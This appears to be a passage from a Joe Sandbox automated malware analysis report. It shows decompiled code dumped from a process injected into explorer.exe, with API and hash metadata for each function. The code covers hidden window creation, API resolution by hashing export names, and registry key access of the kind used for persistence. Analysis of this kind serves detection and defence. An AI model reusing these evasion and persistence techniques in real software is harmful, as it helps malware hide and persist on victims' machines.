                                                                                                                                                                        					_t43 =  *0x7bf908; // 0xeb0e90
                                                                                                                                                                        					_t104 = 0;
                                                                                                                                                                        					_t70 = 0;
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t75 =  *((intOrPtr*)(_t70 + _t43));
                                                                                                                                                                        						if( *((intOrPtr*)(_t70 + _t43)) == 0) {
                                                                                                                                                                        							L6:
                                                                                                                                                                        							if( *((intOrPtr*)(_t70 + _t43)) == _t100) {
                                                                                                                                                                        								_t105 = _t104 << 5;
                                                                                                                                                                        								if(_v8 == _t100) {
                                                                                                                                                                        									 *(_t105 + _t43 + 0x10) = _t100;
                                                                                                                                                                        									_t44 =  *0x7bf908; // 0xeb0e90
                                                                                                                                                                        									 *(_t105 + _t44 + 0xc) = _t100;
                                                                                                                                                                        									L14:
                                                                                                                                                                        									_t76 =  *0x7bf908; // 0xeb0e90
                                                                                                                                                                        									 *((intOrPtr*)(_t105 + _t76 + 0x14)) = _a8;
                                                                                                                                                                        									_t46 =  *0x7bf908; // 0xeb0e90
                                                                                                                                                                        									 *((intOrPtr*)(_t105 + _t46 + 8)) = _v12;
                                                                                                                                                                        									_t47 = E007AB096(0, 1);
                                                                                                                                                                        									_t79 =  *0x7bf908; // 0xeb0e90
                                                                                                                                                                        									 *((intOrPtr*)(_t105 + _t79 + 0x1c)) = _t47;
                                                                                                                                                                        									_t80 =  *0x7bf908; // 0xeb0e90
                                                                                                                                                                        									_t29 = _t80 + _t105 + 4; // 0xeb0e94
                                                                                                                                                                        									_t50 = CreateThread(_t100, _t100, E007AA1BD, _t80 + _t105, _t100, _t29);
                                                                                                                                                                        									_t51 =  *0x7bf908; // 0xeb0e90
                                                                                                                                                                        									 *(_t105 + _t51) = _t50;
                                                                                                                                                                        									_t52 =  *0x7bf908; // 0xeb0e90
                                                                                                                                                                        									if( *(_t105 + _t52) != _t100) {
                                                                                                                                                                        										SetThreadPriority( *(_t105 + _t52), 0xffffffff);
                                                                                                                                                                        										_t83 =  *0x7bf908; // 0xeb0e90
                                                                                                                                                                        										 *0x7bf90c =  *0x7bf90c + 1;
                                                                                                                                                                        										E007AB165( *((intOrPtr*)(_t105 + _t83 + 0x1c)));
                                                                                                                                                                        										_t101 =  *0x7bf908; // 0xeb0e90
                                                                                                                                                                        										_t100 = _t101 + _t105;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t57 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        										 *((intOrPtr*)(_t57 + 0x30))( *((intOrPtr*)(_t105 + _t52 + 0x1c)));
                                                                                                                                                                        										_t59 =  *0x7bf908; // 0xeb0e90
                                                                                                                                                                        										_t36 = _t59 + 0xc; // 0xeb0e9c
                                                                                                                                                                        										_t87 = _t36 + _t105;
                                                                                                                                                                        										if( *((intOrPtr*)(_t36 + _t105)) != _t100) {
                                                                                                                                                                        											E007A8BF4(_t87,  *((intOrPtr*)(_t105 + _t59 + 0x10)));
                                                                                                                                                                        											_t59 =  *0x7bf908; // 0xeb0e90
                                                                                                                                                                        										}
                                                                                                                                                                        										E007A8D6D(_t59 + _t105, _t100, 0x20);
                                                                                                                                                                        									}
                                                                                                                                                                        									L19:
                                                                                                                                                                        									_t85 =  *0x7bf904; // 0x3b0
                                                                                                                                                                        									E007AB165(_t85);
                                                                                                                                                                        									_t56 = _t100;
                                                                                                                                                                        									L20:
                                                                                                                                                                        									return _t56;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t72 = _a4;
                                                                                                                                                                        								_t63 = E007A8BDE(_t72);
                                                                                                                                                                        								_t91 =  *0x7bf908; // 0xeb0e90
                                                                                                                                                                        								 *((intOrPtr*)(_t105 + _t91 + 0xc)) = _t63;
                                                                                                                                                                        								_t64 =  *0x7bf908; // 0xeb0e90
                                                                                                                                                                        								if( *((intOrPtr*)(_t105 + _t64 + 0xc)) == _t100) {
                                                                                                                                                                        									goto L19;
                                                                                                                                                                        								}
                                                                                                                                                                        								 *((intOrPtr*)(_t105 + _t64 + 0x10)) = _t72;
                                                                                                                                                                        								_t65 =  *0x7bf908; // 0xeb0e90
                                                                                                                                                                        								E007A8CBB( *((intOrPtr*)(_t105 + _t65 + 0xc)), _v8, _t72);
                                                                                                                                                                        								_t107 = _t107 + 0xc;
                                                                                                                                                                        								goto L14;
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L7;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(E007AA145(_t75) != 0) {
                                                                                                                                                                        							_t43 =  *0x7bf908; // 0xeb0e90
                                                                                                                                                                        							goto L7;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t92 =  *0x7bf908; // 0xeb0e90
                                                                                                                                                                        						E007AA15B(_t70 + _t92, 0);
                                                                                                                                                                        						_t43 =  *0x7bf908; // 0xeb0e90
                                                                                                                                                                        						goto L6;
                                                                                                                                                                        						L7:
                                                                                                                                                                        						_t70 = _t70 + 0x20;
                                                                                                                                                                        						_t104 = _t104 + 1;
                                                                                                                                                                        					} while (_t70 < 0x1000);
                                                                                                                                                                        					goto L19;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t56 = 0;
                                                                                                                                                                        				goto L20;
                                                                                                                                                                        			}

































                                                                                                                                                                        0x007aa38d
                                                                                                                                                                        0x007aa32c
                                                                                                                                                                        0x007aa330
                                                                                                                                                                        0x007aa335
                                                                                                                                                                        0x007aa338
                                                                                                                                                                        0x007aa33d
                                                                                                                                                                        0x007aa340
                                                                                                                                                                        0x007aa344
                                                                                                                                                                        0x007aa34b
                                                                                                                                                                        0x007aa350
                                                                                                                                                                        0x007aa356
                                                                                                                                                                        0x007aa35d
                                                                                                                                                                        0x007aa362
                                                                                                                                                                        0x007aa38f
                                                                                                                                                                        0x007aa38f
                                                                                                                                                                        0x007aa395
                                                                                                                                                                        0x007aa39b
                                                                                                                                                                        0x007aa39e
                                                                                                                                                                        0x007aa3a0
                                                                                                                                                                        0x007aa3a0
                                                                                                                                                                        0x007aa283
                                                                                                                                                                        0x007aa287
                                                                                                                                                                        0x007aa28d
                                                                                                                                                                        0x007aa293
                                                                                                                                                                        0x007aa297
                                                                                                                                                                        0x007aa2a0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa2a6
                                                                                                                                                                        0x007aa2aa
                                                                                                                                                                        0x007aa2b7
                                                                                                                                                                        0x007aa2bc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa2bc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa261
                                                                                                                                                                        0x007aa247
                                                                                                                                                                        0x007aa274
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa274
                                                                                                                                                                        0x007aa249
                                                                                                                                                                        0x007aa254
                                                                                                                                                                        0x007aa259
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa263
                                                                                                                                                                        0x007aa263
                                                                                                                                                                        0x007aa266
                                                                                                                                                                        0x007aa267
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa26f
                                                                                                                                                                        0x007aa227
                                                                                                                                                                        0x00000000

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: j>{M
                                                                                                                                                                        • API String ID: 0-1785681049
                                                                                                                                                                        • Opcode ID: 775489564eaca1af8d9c241eeb70ce1e98bb77c1d126bf5b888a6764d87a2cf6
                                                                                                                                                                        • Instruction ID: aa2cb2c7e766df66de2e24ea2a44a74d53f4fab03e9d64e929dd584e2ce82bc2
                                                                                                                                                                        • Opcode Fuzzy Hash: 775489564eaca1af8d9c241eeb70ce1e98bb77c1d126bf5b888a6764d87a2cf6
                                                                                                                                                                        • Instruction Fuzzy Hash: 86415C71611608FFCB29DF29EC84F26B7E9EBCA7143148729E806C3265D739B841CB15
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 361 7a33b1-7a3425 call 7a8d6d call 7a96da RegisterClassExA 367 7a34a2-7a34a9 361->367 368 7a3427-7a3456 CreateWindowExA 361->368 369 7a34ab-7a34ac 367->369 370 7a34b4-7a34c9 367->370 368->370 371 7a3458-7a345a 368->371 369->370 373 7a3462-7a3470 371->373 375 7a348f-7a34a0 373->375 375->367 377 7a3472-7a3475 375->377 377->367 378 7a3477-7a3487 377->378 378->375
                                                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                                                        			E007A33B1(void* __eflags) {
                                                                                                                                                                        				struct _WNDCLASSEXA _v52;
                                                                                                                                                                        				char _v80;
                                                                                                                                                                        				char _v144;
                                                                                                                                                                        				intOrPtr _t25;
                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                        				intOrPtr _t36;
                                                                                                                                                                        				intOrPtr _t39;
                                                                                                                                                                        				struct HWND__* _t44;
                                                                                                                                                                        				intOrPtr _t45;
                                                                                                                                                                        				intOrPtr _t47;
                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                        				void* _t51;
                                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                        				void* _t62;
                                                                                                                                                                        				struct HINSTANCE__* _t63;
                                                                                                                                                                        
                                                                                                                                                                        				_t25 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        				_t63 =  *((intOrPtr*)(_t25 + 0x10))(0);
                                                                                                                                                                        				E007A8D6D( &_v52, 0, 0x30);
                                                                                                                                                                        				_t59 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        				_push(_t59 + 0x648);
                                                                                                                                                                        				_push(0x32);
                                                                                                                                                                        				_t62 = 0x1e;
                                                                                                                                                                        				E007A96DA( &_v144, _t62);
                                                                                                                                                                        				_v52.style = 3;
                                                                                                                                                                        				_v52.cbSize = 0x30;
                                                                                                                                                                        				_v52.lpszClassName =  &_v144;
                                                                                                                                                                        				_v52.lpfnWndProc = E007A334E;
                                                                                                                                                                        				_v52.hInstance = _t63;
                                                                                                                                                                        				if(RegisterClassExA( &_v52) == 0) {
                                                                                                                                                                        					L6:
                                                                                                                                                                        					_t34 =  *0x7bf8b0; // 0x100070
                                                                                                                                                                        					if(_t34 != 0) {
                                                                                                                                                                        						_t39 =  *0x7bf828; // 0xeaf838
                                                                                                                                                                        						 *((intOrPtr*)(_t39 + 0x28))(_t34);
                                                                                                                                                                        					}
                                                                                                                                                                        					L8:
                                                                                                                                                                        					_t36 =  *0x7bf828; // 0xeaf838
                                                                                                                                                                        					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t63);
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t63, 0);
                                                                                                                                                                        				 *0x7bf8b0 = _t44;
                                                                                                                                                                        				if(_t44 == 0) {
                                                                                                                                                                        					goto L8;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t45 =  *0x7bf828; // 0xeaf838, executed
                                                                                                                                                                        				 *((intOrPtr*)(_t45 + 0x14))(_t44, 0);
                                                                                                                                                                        				_t47 =  *0x7bf828; // 0xeaf838
                                                                                                                                                                        				 *((intOrPtr*)(_t47 + 0x18))( *0x7bf8b0);
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					_t50 =  *0x7bf828; // 0xeaf838
                                                                                                                                                                        					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
                                                                                                                                                                        					if(_t51 == 0) {
                                                                                                                                                                        						goto L6;
                                                                                                                                                                        					}
                                                                                                                                                                        					if(_t51 == 0xffffffff) {
                                                                                                                                                                        						goto L6;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t53 =  *0x7bf828; // 0xeaf838
                                                                                                                                                                        					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
                                                                                                                                                                        					_t56 =  *0x7bf828; // 0xeaf838
                                                                                                                                                                        					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
                                                                                                                                                                        				}
                                                                                                                                                                        				goto L6;
                                                                                                                                                                        			}


                                                                                                                                                                        0x007a344f
                                                                                                                                                                        0x007a3456
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a345a
                                                                                                                                                                        0x007a345f
                                                                                                                                                                        0x007a3462
                                                                                                                                                                        0x007a346d
                                                                                                                                                                        0x007a348f
                                                                                                                                                                        0x007a3496
                                                                                                                                                                        0x007a349b
                                                                                                                                                                        0x007a34a0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a3475
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a347b
                                                                                                                                                                        0x007a3480
                                                                                                                                                                        0x007a3487
                                                                                                                                                                        0x007a348c
                                                                                                                                                                        0x007a348c
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007A8D6D: memset.MSVCRT ref: 007A8D7F
                                                                                                                                                                        • RegisterClassExA.USER32(00000030), ref: 007A341F
                                                                                                                                                                        • CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 007A344C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClassCreateRegisterWindowmemset
                                                                                                                                                                        • String ID: 0
                                                                                                                                                                        • API String ID: 2030675355-4108050209
                                                                                                                                                                        • Opcode ID: a6f41dcd7f5f4e1bbe7c87e62297a48bd5b1cce3a9d0ed2eef831f99602451ec
                                                                                                                                                                        • Instruction ID: f3bd056ea94cf6975001eb228ba132ba908333a1e593b3234662803124f5a329
                                                                                                                                                                        • Opcode Fuzzy Hash: a6f41dcd7f5f4e1bbe7c87e62297a48bd5b1cce3a9d0ed2eef831f99602451ec
                                                                                                                                                                        • Instruction Fuzzy Hash: 6631C6B2500118AFEB11DFA8EC88FAA77FCEB09754F008266F505D7161DB39EE458B64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        [Control-flow graph of the function at 7aeebb; nodes are marked Executed or Not Executed]
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007AEEBB(void* __ecx, intOrPtr __edx) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                        				char _v92;
                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                        				signed int _t47;
                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                        				void* _t56;
                                                                                                                                                                        				struct HINSTANCE__* _t58;
                                                                                                                                                                        				_Unknown_base(*)()* _t59;
                                                                                                                                                                        				intOrPtr _t60;
                                                                                                                                                                        				void* _t62;
                                                                                                                                                                        				intOrPtr _t63;
                                                                                                                                                                        				void* _t69;
                                                                                                                                                                        				char _t70;
                                                                                                                                                                        				void* _t75;
                                                                                                                                                                        				CHAR* _t80;
                                                                                                                                                                        				void* _t82;
                                                                                                                                                                        
                                                                                                                                                                        				_t75 = __ecx;
                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                        				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                                                                                                                        				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                                                                                                                                                                        				if(_t41 == 0) {
                                                                                                                                                                        					L4:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t62 = _t41 + __ecx;
                                                                                                                                                                        				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                                                                                                                                                                        				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                        				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                                                                                                                                                                        				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                                                                                                                                                                        				_t47 = 0;
                                                                                                                                                                        				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				_v16 = _t63;
                                                                                                                                                                        				if(_t63 == 0) {
                                                                                                                                                                        					goto L4;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					goto L2;
                                                                                                                                                                        				}
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					L2:
                                                                                                                                                                        					_t49 = E007AE2C5( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E007AA43D( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                                                                                                                                                                        					_t51 = _v8;
                                                                                                                                                                        					if((_t49 ^ 0x218fe95b) == _v12) {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t73 = _v20;
                                                                                                                                                                        					_t47 = _t51 + 1;
                                                                                                                                                                        					_v8 = _t47;
                                                                                                                                                                        					if(_t47 < _v16) {
                                                                                                                                                                        						continue;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L4;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                                                                                                                                                                        				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                                                                                                                                                                        				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                                                                                                                                                                        					return _t80;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t56 = 0;
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_t70 = _t80[_t56];
                                                                                                                                                                        						if(_t70 == 0x2e || _t70 == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                                                                                                                                                                        						_t56 = _t56 + 1;
                                                                                                                                                                        						if(_t56 < 0x40) {
                                                                                                                                                                        							continue;
                                                                                                                                                                        						}
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                                                                                                                                                                        					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                                                                                                                                                                        					if( *((char*)(_t56 + _t80)) != 0) {
                                                                                                                                                                        						_t80 =  &(( &(_t80[1]))[_t56]);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t40 =  &_v92; // 0x6c6c642e
                                                                                                                                                                        					_t58 = LoadLibraryA(_t40); // executed
                                                                                                                                                                        					if(_t58 == 0) {
                                                                                                                                                                        						goto L4;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t59 = GetProcAddress(_t58, _t80);
                                                                                                                                                                        					if(_t59 == 0) {
                                                                                                                                                                        						goto L4;
                                                                                                                                                                        					}
                                                                                                                                                                        					return _t59;
                                                                                                                                                                        				}
                                                                                                                                                                        			}


























                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 007AEF8B
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 007AEF97
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                        • String ID: .dll
                                                                                                                                                                        • API String ID: 2574300362-2738580789
                                                                                                                                                                        • Opcode ID: d1128dc244a04f66bb4dcd51e7459e23ff254cc316cf15742f70b97029645074
                                                                                                                                                                        • Instruction ID: 7b0457dbd128005452926f97e4a28597dc8e76f6f82e8ebc0736a0f046a465d0
                                                                                                                                                                        • Opcode Fuzzy Hash: d1128dc244a04f66bb4dcd51e7459e23ff254cc316cf15742f70b97029645074
                                                                                                                                                                        • Instruction Fuzzy Hash: F631B071A001169FCF64CF6DC884BAEBBE5EF86304F284569D805E7351E738E941CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 402 7aa633-7aa665 call 7a8bde 405 7aa66b-7aa68b call 7ac43a 402->405 406 7aa902-7aa906 402->406 409 7aa68d 405->409 410 7aa690-7aa6a5 call 7a9dd8 405->410 409->410 413 7aa6ab-7aa6c3 410->413 414 7aa7de-7aa7eb 410->414 421 7aa7db 413->421 422 7aa6c9-7aa6e5 413->422 415 7aa82c-7aa83c call 7a9a07 414->415 416 7aa7ed-7aa80e 414->416 425 7aa83f-7aa841 415->425 423 7aa810-7aa82a call 7a9a07 416->423 424 7aa844-7aa864 call 7a8b9c RegOpenKeyExA 416->424 421->414 422->424 431 7aa6eb-7aa705 call 7a9a07 422->431 423->425 433 7aa88b-7aa890 424->433 434 7aa866-7aa87b RegCreateKeyA 424->434 425->424 436 7aa8d4-7aa8f1 call 7a8bf4 call 7a8d6d 431->436 442 7aa70b-7aa723 431->442 438 7aa898 433->438 439 7aa892 433->439 435 7aa87d-7aa882 434->435 434->436 440 7aa886-7aa889 435->440 441 7aa884 435->441 454 7aa8f3-7aa900 call 7a8bf4 436->454 443 7aa89b-7aa8a5 RegCloseKey 438->443 439->438 440->443 441->440 451 7aa79b-7aa7a0 442->451 452 7aa725-7aa76c call 7a9df2 call 7a9a5a call 7a8baf call 7a9930 442->452 443->436 445 7aa8a7-7aa8bb call 7aa43d 443->445 445->454 456 7aa8bd-7aa8d0 445->456 459 7aa7a6-7aa7d9 call 7a9a07 call 7a8bf4 451->459 474 7aa77b-7aa799 call 7a8bf4 * 2 452->474 475 7aa76e-7aa773 452->475 454->406 456->456 460 7aa8d2 456->460 459->424 460->454 474->459 475->474 476 7aa775 475->476 476->474
                                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                                        			E007AA633(char __ecx, int __edx, void* __fp0, intOrPtr _a4, int* _a8, intOrPtr* _a12) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				int _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				int _v24;
                                                                                                                                                                        				void* _v28;
                                                                                                                                                                        				char _v32;
                                                                                                                                                                        				char _v36;
                                                                                                                                                                        				char _v40;
                                                                                                                                                                        				int _v44;
                                                                                                                                                                        				char _v108;
                                                                                                                                                                        				int _t85;
                                                                                                                                                                        				char _t89;
                                                                                                                                                                        				void* _t90;
                                                                                                                                                                        				char* _t91;
                                                                                                                                                                        				intOrPtr* _t96;
                                                                                                                                                                        				void* _t107;
                                                                                                                                                                        				int* _t115;
                                                                                                                                                                        				intOrPtr _t118;
                                                                                                                                                                        				char* _t121;
                                                                                                                                                                        				intOrPtr _t122;
                                                                                                                                                                        				intOrPtr _t124;
                                                                                                                                                                        				intOrPtr _t127;
                                                                                                                                                                        				char _t129;
                                                                                                                                                                        				intOrPtr _t130;
                                                                                                                                                                        				intOrPtr _t132;
                                                                                                                                                                        				char* _t135;
                                                                                                                                                                        				int _t139;
                                                                                                                                                                        				int _t143;
                                                                                                                                                                        				intOrPtr _t144;
                                                                                                                                                                        				intOrPtr* _t150;
                                                                                                                                                                        				int _t151;
                                                                                                                                                                        				char _t157;
                                                                                                                                                                        				int _t159;
                                                                                                                                                                        				intOrPtr _t160;
                                                                                                                                                                        				intOrPtr _t167;
                                                                                                                                                                        				int _t172;
                                                                                                                                                                        				char* _t173;
                                                                                                                                                                        				char* _t174;
                                                                                                                                                                        				char _t175;
                                                                                                                                                                        				void* _t176;
                                                                                                                                                                        				void* _t177;
                                                                                                                                                                        				void* _t179;
                                                                                                                                                                        
                                                                                                                                                                        				_t172 = 0;
                                                                                                                                                                        				_v24 = __edx;
                                                                                                                                                                        				_t173 = 0;
                                                                                                                                                                        				_v32 = __ecx;
                                                                                                                                                                        				_v28 = 0;
                                                                                                                                                                        				_v8 = 0x80000001;
                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                        				_t85 = E007A8BDE(0x110);
                                                                                                                                                                        				_t151 = _t85;
                                                                                                                                                                        				_v44 = _t151;
                                                                                                                                                                        				_t180 = _t151;
                                                                                                                                                                        				if(_t151 == 0) {
                                                                                                                                                                        					return _t85;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t154 = _a4;
                                                                                                                                                                        				 *((intOrPtr*)(_t151 + 0x108)) = _a4;
                                                                                                                                                                        				E007AC43A(_a4, __edx, _t180, __fp0, _t154,  &_v108);
                                                                                                                                                                        				_t157 = _v108;
                                                                                                                                                                        				_t89 = _t157;
                                                                                                                                                                        				if(_t157 - 0x61 <= 0x19) {
                                                                                                                                                                        					_t89 = _t89 - 0x20;
                                                                                                                                                                        				}
                                                                                                                                                                        				_v108 = _t89;
                                                                                                                                                                        				_t90 = E007A9DD8(0xf30);
                                                                                                                                                                        				_t159 = _v24;
                                                                                                                                                                        				_v16 = _t90;
                                                                                                                                                                        				if(_t159 == 0) {
                                                                                                                                                                        					L15:
                                                                                                                                                                        					_t160 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        					__eflags =  *((intOrPtr*)(_t160 + 0x214)) - 3;
                                                                                                                                                                        					if( *((intOrPtr*)(_t160 + 0x214)) != 3) {
                                                                                                                                                                        						_push(_t172);
                                                                                                                                                                        						_push( &_v108);
                                                                                                                                                                        						_push("\\");
                                                                                                                                                                        						_t91 = E007A9A07(_t90);
                                                                                                                                                                        						_t177 = _t177 + 0x10;
                                                                                                                                                                        						L19:
                                                                                                                                                                        						_t173 = _t91;
                                                                                                                                                                        						_v20 = _t173;
                                                                                                                                                                        						goto L20;
                                                                                                                                                                        					}
                                                                                                                                                                        					_v24 = _t172;
                                                                                                                                                                        					_v8 = 0x80000003;
                                                                                                                                                                        					_t118 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        					 *((intOrPtr*)(_t118 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x110)))),  &_v24);
                                                                                                                                                                        					__eflags = _v24 - _t173;
                                                                                                                                                                        					if(_v24 == _t173) {
                                                                                                                                                                        						goto L20;
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(_t172);
                                                                                                                                                                        					_push( &_v108);
                                                                                                                                                                        					_t121 = "\\";
                                                                                                                                                                        					_push(_t121);
                                                                                                                                                                        					_push(_v16);
                                                                                                                                                                        					_push(_t121);
                                                                                                                                                                        					_t91 = E007A9A07(_v24);
                                                                                                                                                                        					_t177 = _t177 + 0x18;
                                                                                                                                                                        					goto L19;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t122 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        					_push( *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x110)))));
                                                                                                                                                                        					_t124 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        					_push(_t159);
                                                                                                                                                                        					if( *((intOrPtr*)(_t124 + 0x68))() != 0) {
                                                                                                                                                                        						_t90 = _v16;
                                                                                                                                                                        						goto L15;
                                                                                                                                                                        					}
                                                                                                                                                                        					_v12 = _t172;
                                                                                                                                                                        					_t127 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        					_v8 = 0x80000003;
                                                                                                                                                                        					 *((intOrPtr*)(_t127 + 0x20))(_v24,  &_v12);
                                                                                                                                                                        					if(_v12 == _t173) {
                                                                                                                                                                        						L20:
                                                                                                                                                                        						E007A8B9C( &_v16);
                                                                                                                                                                        						if(RegOpenKeyExA(_v8, _t173, _t172, 0x20019,  &_v28) == 0) {
                                                                                                                                                                        							_t96 = _a8;
                                                                                                                                                                        							__eflags = _t96;
                                                                                                                                                                        							if(_t96 != 0) {
                                                                                                                                                                        								 *_t96 = 1;
                                                                                                                                                                        							}
                                                                                                                                                                        							RegCloseKey(_v28);
                                                                                                                                                                        							L28:
                                                                                                                                                                        							if(_t173 == 0) {
                                                                                                                                                                        								L32:
                                                                                                                                                                        								E007A8BF4( &_v44, 0x110);
                                                                                                                                                                        								E007A8D6D( &_v108, _t172, 0x40);
                                                                                                                                                                        								_t151 = _t172;
                                                                                                                                                                        								L33:
                                                                                                                                                                        								E007A8BF4( &_v20, 0xffffffff);
                                                                                                                                                                        								return _t151;
                                                                                                                                                                        							}
